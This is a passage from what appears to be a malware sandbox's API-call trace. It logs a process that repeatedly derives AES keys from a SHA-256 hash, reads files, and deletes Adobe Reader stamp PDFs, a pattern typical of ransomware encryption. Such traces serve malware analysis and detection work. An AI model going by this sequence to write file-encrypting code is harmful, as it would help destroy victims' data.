phKey=0x3267c14*=0x284d728) returned 1 [0209.985] GetFileSize (in: hFile=0x654, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9306 [0209.985] ReadFile (in: hFile=0x654, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.989] CryptDestroyHash (hHash=0x284d768) returned 1 [0209.989] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.989] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.991] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\signhere.pdf")) returned 1 [0209.992] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.992] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.992] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.992] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.992] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18757 [0209.993] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0210.021] CryptDestroyHash (hHash=0x284d668) returned 1 [0210.021] CryptDestroyKey (hKey=0x284d728) returned 1 [0210.021] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0210.023] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\standardbusiness.pdf")) returned 1 [0210.100] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0210.226] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0210.227] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0210.227] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0210.227] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0210.227] GetFileSize (in: hFile=0x654, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcadf [0210.227] ReadFile (in: hFile=0x654, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0210.568] CryptDestroyHash (hHash=0x284d768) returned 1 [0210.568] CryptDestroyKey (hKey=0x284d728) returned 1 [0210.568] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0210.569] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\dynamic.pdf")) returned 1 [0210.573] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0210.574] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0210.574] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0210.574] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0210.574] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa36f [0210.574] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0210.591] CryptDestroyHash (hHash=0x284d668) returned 1 [0210.591] CryptDestroyKey (hKey=0x284d728) returned 1 [0210.591] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0210.593] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\signhere.pdf")) returned 1 [0210.595] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0210.596] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0210.596] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0210.596] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0210.596] GetFileSize (in: hFile=0x654, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x178c0 [0210.596] ReadFile (in: hFile=0x654, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0210.808] CryptDestroyHash (hHash=0x284d768) returned 1 [0210.808] CryptDestroyKey (hKey=0x284d728) returned 1 [0210.808] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0210.809] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\standardbusiness.pdf")) returned 1 [0210.879] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0210.936] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0210.937] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0210.937] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0210.937] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0210.937] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdf82 [0210.937] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.163] CryptDestroyHash (hHash=0x284d668) returned 1 [0211.163] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.163] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.164] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\dynamic.pdf")) returned 1 [0211.166] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.166] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.166] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.166] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.166] GetFileSize (in: hFile=0x654, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9f16 [0211.166] ReadFile (in: hFile=0x654, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.233] CryptDestroyHash (hHash=0x284d768) returned 1 [0211.233] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.233] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.234] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\signhere.pdf")) returned 1 [0211.236] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.237] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.237] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.237] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.237] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a8db [0211.237] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.251] CryptDestroyHash (hHash=0x284d668) returned 1 [0211.251] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.251] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.253] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\standardbusiness.pdf")) returned 1 [0211.255] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0211.258] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.258] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.258] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.258] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.258] GetFileSize (in: hFile=0x654, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcdd8 [0211.258] ReadFile (in: hFile=0x654, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.264] CryptDestroyHash (hHash=0x284d768) returned 1 [0211.264] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.264] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.265] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\dynamic.pdf")) returned 1 [0211.267] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.267] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.267] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.267] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.267] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8c96 [0211.267] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.273] CryptDestroyHash (hHash=0x284d668) returned 1 [0211.273] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.273] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.275] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\signhere.pdf")) returned 1 [0211.276] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.277] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.277] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.277] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.277] GetFileSize (in: hFile=0x654, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a88d [0211.277] ReadFile (in: hFile=0x654, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.601] CryptDestroyHash (hHash=0x284d768) returned 1 [0211.601] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.601] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.602] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\standardbusiness.pdf")) returned 1 [0211.679] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0211.715] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.716] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.716] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.716] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.716] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcdd8 [0211.716] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.725] CryptDestroyHash (hHash=0x284d668) returned 1 [0211.725] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.725] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.726] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\dynamic.pdf")) returned 1 [0211.727] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.728] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.728] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.728] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.728] GetFileSize (in: hFile=0x654, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x892d [0211.728] ReadFile (in: hFile=0x654, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.732] CryptDestroyHash (hHash=0x284d768) returned 1 [0211.732] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.733] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.734] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\faces.pdf")) returned 1 [0211.735] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.736] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.736] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.736] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.736] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc084 [0211.736] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.774] CryptDestroyHash (hHash=0x284d668) returned 1 [0211.774] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.774] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.775] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\pointers.pdf")) returned 1 [0211.778] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.778] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.778] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.778] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.778] GetFileSize (in: hFile=0x654, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8c96 [0211.778] ReadFile (in: hFile=0x654, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.783] CryptDestroyHash (hHash=0x284d768) returned 1 [0211.783] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.783] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.784] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\signhere.pdf")) returned 1 [0211.785] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.786] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.786] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.786] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.786] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2eb9e [0211.786] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.800] CryptDestroyHash (hHash=0x284d668) returned 1 [0211.800] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.800] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.801] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\standard.pdf")) returned 1 [0211.803] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0211.804] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0211.804] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0211.804] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0211.804] GetFileSize (in: hFile=0x654, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a88d [0211.804] ReadFile (in: hFile=0x654, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0211.924] CryptDestroyHash (hHash=0x284d768) returned 1 [0211.924] CryptDestroyKey (hKey=0x284d728) returned 1 [0211.924] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0211.925] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\standardbusiness.pdf")) returned 1 [0211.967] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0212.058] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.059] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.059] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.059] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.059] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30eb7 [0212.059] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.105] CryptDestroyHash (hHash=0x284d668) returned 1 [0212.105] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.105] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.106] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\dynamic.pdf")) returned 1 [0212.108] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.108] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, 